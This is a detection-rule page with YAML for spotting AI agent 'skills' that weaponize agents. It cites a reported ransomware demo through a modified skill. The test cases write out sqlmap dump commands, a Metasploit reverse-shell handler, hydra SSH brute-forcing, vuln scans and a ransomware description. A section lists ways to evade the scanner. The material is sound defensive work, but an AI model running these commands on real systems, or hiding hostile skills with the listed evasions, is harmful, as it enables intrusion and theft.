ATR-2026-00122highSkill 入侵experimental

Weaponized Skill — Agent as Attack Tool

Detects skills that weaponize AI agents for offensive operations. Cato Networks demonstrated deploying MedusaLocker ransomware via a modified Claude skill (Dec 2025, disclosed to Anthropic Oct 30, 2025). The "consent gap" allows approved skills to download/execute code, read env vars, and write files without further prompts. arXiv 2601.17548 documents attack tooling embedded in skills with 41-84% success rates. Real examples include SQLMap workflows, Metasploit payloads, and credential brute-force tools found on skills.sh and ClawHub.

嚴重度

high

類別

Skill 入侵

掃描目標

skill

作者

ATR Community

建議回應

alertalert

參考資料

OWASP Agentic

ASI05:2026 - Unexpected Code ExecutionASI01:2026 - Agent Goal Hijack

OWASP LLM

LLM06:2025 - Excessive Agency

MITRE ATLAS

AML.T0010 - AI Supply Chain Compromise

實地驗證

驗證日期

2026-04-08

樣本數

53,577

誤報率（實地語料）

0.0504%

偵測條件

組合方式: any

01
SQLMap attack execution (real skills.sh finding)
欄位: content運算子: regex
02
Metasploit exploitation framework
欄位: content運算子: regex
03
Credential brute-force tooling
欄位: content運算子: regex
04
Network exploitation scanning
欄位: content運算子: regex
05
Ransomware: encryption + payment demand combo (Cato MedusaLocker)
欄位: content運算子: regex

攻擊範例（規則會觸發）

觸發條件: SQLMap execution

## Database Extraction
```bash
sqlmap -u 'http://target/page?id=1' --dbs --dump --batch
```

觸發條件: Ransomware behavior

This skill will encrypt all files in the target directory and generate a ransom note with the bitcoin wallet address for payment.

觸發條件: Metasploit exploitation

```
msfconsole
use exploit/multi/handler
set payload/meterpreter/reverse_tcp
set LHOST 10.0.0.1
```

## Credential Brute Force
Run the following to crack SSH logins:
hydra -L users.txt -P passwords.txt ssh://192.168.1.1

Step 1: Scan for vulnerable hosts
nmap 192.168.0.0/24 --script=vuln -sV
Step 2: Use masscan -p 1-65535 10.0.0.0/8 to find all open ports quickly

以上為真實攻擊 payload 的脫敏版本，與規則一同版本化，作為 regression test——確保未來的修訂不會悄悄漏掉它們。

正常樣本（規則不會觸發）

Defensive reference to attack tool

# SQL Injection Prevention
Always use parameterized queries. sqlmap is a tool used by attackers that you should defend against.

Legitimate network scanning without exploit scripts

# Network Monitoring
Use nmap to scan your own network for open ports.

Legitimate encryption utility — mentions encrypting files but has no ransom/payment/bitcoin context within 200 chars

# File Encryption Utility
This tool encrypts all files in a directory using AES-256. Encrypted files can be decrypted with the same key. Contact support for help recovering lost keys.

Defensive security training content that discusses attack concepts abstractly without any tool command syntax

# Security Awareness Training
Attackers may use credential-guessing tools or network scanners to find vulnerabilities. Always enforce strong passwords and keep systems patched.

Legitimate nmap results report — references nmap but without --script=exploit/vuln/brute flags

# Port Scanner Results
The nmap scan found ports 22, 80, and 443 open. No critical vulnerabilities were detected. Recommend closing port 22 to external traffic.

已知誤報情境

▸Authorized penetration testing skills with explicit scope controls
▸CTF competition skills in sandboxed environments
▸Defensive security skills that reference attack tools conceptually
▸Security audit documentation that includes exact command examples from penetration testing reports for remediation guidance
▸Academic cybersecurity coursework or textbooks quoting tool syntax in instructional contexts

已記錄的規避手法

手法: language switch
```
## Extraction de base de données
Utilisez sql_map avec le drapeau url cible et l'option extraction automatique pour vider les tables.
```
French paraphrase of SQLMap usage avoids the literal 'sqlmap' keyword and English flag syntax that the regex requires.
手法: unicode homoglyph
```
Run the sqlmap tool with the --dbs and --dump flags against the target URL to extract database contents.
```
Zero-width spaces inserted within 'sqlmap', '--dbs', and '--dump' break the regex token matching while remaining visually identical.

手法: casual paraphrase

Hey, go grab that database enumeration script — the one that auto-discovers schemas and exports table rows from a given web endpoint. Use batch mode so it doesn't ask questions.

Describes SQLMap functionality in casual natural language without using the tool name or any CLI flags, completely evading the regex patterns.

這些是公開記錄的繞過手法。一個標準的可信度，取決於它願不願意公開自己最差的數字——所以已知限制寫在規則裡，而不是藏起來。

完整 YAML 定義

在 GitHub 編輯 →

title: Weaponized Skill — Agent as Attack Tool
id: ATR-2026-00122
rule_version: 1
status: experimental
description: >
  Detects skills that weaponize AI agents for offensive operations. Cato Networks demonstrated deploying MedusaLocker
  ransomware via a modified Claude skill (Dec 2025, disclosed to Anthropic Oct 30, 2025). The "consent gap" allows
  approved skills to download/execute code, read env vars, and write files without further prompts. arXiv 2601.17548
  documents attack tooling embedded in skills with 41-84% success rates. Real examples include SQLMap workflows,
  Metasploit payloads, and credential brute-force tools found on skills.sh and ClawHub.
author: ATR Community
date: 2026/03/29
schema_version: "0.1"
detection_tier: pattern
maturity: test
severity: high
references:
  mitre_atlas:
    - AML.T0010 - AI Supply Chain Compromise
  owasp_llm:
    - LLM06:2025 - Excessive Agency
  owasp_agentic:
    - ASI05:2026 - Unexpected Code Execution
    - ASI01:2026 - Agent Goal Hijack
  owasp_ast:
    - AST01:2026 - Malicious Skills
    - AST03:2026 - Over-Privileged Skills
  research:
    - "Cato Networks: MedusaLocker via Claude skill (Dec 2025)"
    - "arXiv 2601.17548: 41-84% attack success"
    - "Axios: Anthropic Claude skills ransomware disclosure"
metadata_provenance:
  mitre_atlas: auto-generated
compliance:
  nist_ai_rmf:
    - subcategory: "GV.6.1"
      context: >-
        Weaponized skills are third-party/supplier AI components that embed offensive tooling (SQLMap, Metasploit, ransomware payloads) into agent workflows; GV.6.1 requires policies and procedures to address third-party AI supply chain risks where approved skills can execute malicious code without further consent.
      strength: primary
    - subcategory: "MG.3.2"
      context: >-
        Detecting offensive tooling embedded in skills directly evidences the need to monitor pre-trained models and skill artifacts used for development; MG.3.2 mandates ongoing monitoring of these third-party components for malicious modifications like the MedusaLocker-laden Claude skill.
      strength: secondary
    - subcategory: "MG.2.3"
      context: >-
        Detection of weaponized skills must trigger mechanisms to disengage or deactivate the AI system before the consent gap is exploited to download/execute code or exfiltrate credentials; MG.2.3 requires these supersede/deactivate controls be in place.
      strength: secondary
    - subcategory: "MS.2.7"
      context: "NIST AI RMF MEASURE 2.7 (security and resilience evaluated and documented) is supported by this rule's runtime detection of the skill supply-chain compromise (Weaponized Skill — Agent as Attack Tool)."
      strength: primary
    - subcategory: "MG.3.1"
      context: "NIST AI RMF MANAGE 3.1 (third-party resources regularly monitored) is supported where this rule detects the skill supply-chain compromise (Weaponized Skill — Agent as Attack Tool)."
      strength: secondary
  iso_42001:
    - clause: "8.1"
      context: "ISO/IEC 42001 Clause 8.1 (operational planning and control, including control of externally provided processes) is operationalised by this rule's detection of the skill supply-chain compromise (Weaponized Skill — Agent as Attack Tool)."
      strength: primary
    - clause: "8.3"
      context: "ISO/IEC 42001 Clause 8.3 (AI risk treatment) is supported by this rule, which implements runtime detection of the skill supply-chain compromise (Weaponized Skill — Agent as Attack Tool) as a treatment control."
      strength: secondary
  eu_ai_act:
    - article: "15"
      context: "Article 15 (accuracy, robustness and cybersecurity) requires high-risk AI systems to resist unauthorised attempts to alter their use, outputs or performance; this rule provides runtime detection evidence by flagging the skill supply-chain compromise (Weaponized Skill — Agent as Attack Tool)."
      strength: primary
    - article: "9"
      context: "Article 9 (risk management system) requires identified risks to be addressed by appropriate measures; this rule is a runtime risk-treatment control that detects the skill supply-chain compromise (Weaponized Skill — Agent as Attack Tool)."
      strength: secondary
tags:
  category: skill-compromise
  subcategory: weaponized-skill
  scan_target: skill
  confidence: medium
agent_source:
  type: mcp_exchange
  framework:
    - skill_md
  provider:
    - any
detection:
  conditions:
    - field: content
      operator: regex
      value: (?i)sqlmap\s+(-[uo]\s|--url\s|--dbs|--dump|--os-shell|--batch)
      description: SQLMap attack execution (real skills.sh finding)
    - field: content
      operator: regex
      value: (?i)(msfconsole|msfvenom|use\s+exploit/|set\s+payload/|set\s+LHOST|set\s+RHOST)
      description: Metasploit exploitation framework
    - field: content
      operator: regex
      value: (?i)(hydra\s+-[lLpPCM]|john\s+--wordlist|hashcat\s+-[am]\s|medusa\s+-[hHuUpP])
      description: Credential brute-force tooling
    - field: content
      operator: regex
      value: (?i)(nmap\s+.*--script[= ](exploit|vuln|brute)|masscan\s+-p|nikto\s+-h)
      description: Network exploitation scanning
    - field: content
      operator: regex
      value: >-
        (?i)(encrypt\s+(all|every|the)\s+(file|document|data).{0,200}(ransom|payment|bitcoin|wallet|decrypt\s+fee|pay\s+to))|(ransom\s+note.{0,100}(bitcoin|wallet|payment|decrypt))
      description: "Ransomware: encryption + payment demand combo (Cato MedusaLocker)"
  condition: any
  false_positives:
    - Authorized penetration testing skills with explicit scope controls
    - CTF competition skills in sandboxed environments
    - Defensive security skills that reference attack tools conceptually
    - >-
      Security audit documentation that includes exact command examples from penetration testing reports for remediation
      guidance
    - Academic cybersecurity coursework or textbooks quoting tool syntax in instructional contexts
response:
  actions:
    - alert
    - alert
  message_template: >
    [ATR-2026-122] Weaponized skill detected. This skill contains executable attack tooling that could turn the AI agent
    into an offensive weapon. See: Cato Networks MedusaLocker PoC (Dec 2025).
confidence: 70
wild_validated: 2026/04/08
wild_samples: 53577
wild_fp_rate: 0.0504
test_cases:
  true_positives:
    - input: |-
        ## Database Extraction
        ```bash
        sqlmap -u 'http://target/page?id=1' --dbs --dump --batch
        ```
      expected: triggered
      matched_condition: SQLMap execution
    - input: >-
        This skill will encrypt all files in the target directory and generate a ransom note with the bitcoin wallet
        address for payment.
      expected: triggered
      matched_condition: Ransomware behavior
    - input: |-
        ```
        msfconsole
        use exploit/multi/handler
        set payload/meterpreter/reverse_tcp
        set LHOST 10.0.0.1
        ```
      expected: triggered
      matched_condition: Metasploit exploitation
    - input: |-
        ## Credential Brute Force
        Run the following to crack SSH logins:
        hydra -L users.txt -P passwords.txt ssh://192.168.1.1
      expected: triggered
      description: Hydra credential brute-force tool with login/password list flags (matches pattern 3)
    - input: |-
        Step 1: Scan for vulnerable hosts
        nmap 192.168.0.0/24 --script=vuln -sV
        Step 2: Use masscan -p 1-65535 10.0.0.0/8 to find all open ports quickly
      expected: triggered
      description: Network exploitation scanning with nmap vuln scripts and masscan port scan (matches pattern 4)
  true_negatives:
    - input: |-
        # SQL Injection Prevention
        Always use parameterized queries. sqlmap is a tool used by attackers that you should defend against.
      expected: not_triggered
      description: Defensive reference to attack tool
    - input: |-
        # Network Monitoring
        Use nmap to scan your own network for open ports.
      expected: not_triggered
      description: Legitimate network scanning without exploit scripts
    - input: >-
        # File Encryption Utility

        This tool encrypts all files in a directory using AES-256. Encrypted files can be decrypted with the same key.
        Contact support for help recovering lost keys.
      expected: not_triggered
      description: >-
        Legitimate encryption utility — mentions encrypting files but has no ransom/payment/bitcoin context within 200
        chars
    - input: >-
        # Security Awareness Training

        Attackers may use credential-guessing tools or network scanners to find vulnerabilities. Always enforce strong
        passwords and keep systems patched.
      expected: not_triggered
      description: Defensive security training content that discusses attack concepts abstractly without any tool command syntax
    - input: >-
        # Port Scanner Results

        The nmap scan found ports 22, 80, and 443 open. No critical vulnerabilities were detected. Recommend closing
        port 22 to external traffic.
      expected: not_triggered
      description: Legitimate nmap results report — references nmap but without --script=exploit/vuln/brute flags
evasion_tests:
  - input: |-
      ## Extraction de base de données
      Utilisez sql_map avec le drapeau url cible et l'option extraction automatique pour vider les tables.
    expected: not_triggered
    bypass_technique: language_switch
    notes: >-
      French paraphrase of SQLMap usage avoids the literal 'sqlmap' keyword and English flag syntax that the regex
      requires.
  - input: Run the sqlmap tool with the --dbs and --dump flags against the target URL to extract database contents.
    expected: not_triggered
    bypass_technique: unicode_homoglyph
    notes: >-
      Zero-width spaces inserted within 'sqlmap', '--dbs', and '--dump' break the regex token matching while remaining
      visually identical.
  - input: >-
      Hey, go grab that database enumeration script — the one that auto-discovers schemas and exports table rows from a
      given web endpoint. Use batch mode so it doesn't ask questions.
    expected: not_triggered
    bypass_technique: casual_paraphrase
    notes: >-
      Describes SQLMap functionality in casual natural language without using the tool name or any CLI flags, completely
      evading the regex patterns.

修訂歷史

建立於

2026-03-29

最後修改

2026-07-07

在 GitHub 查看完整 commit 歷史 →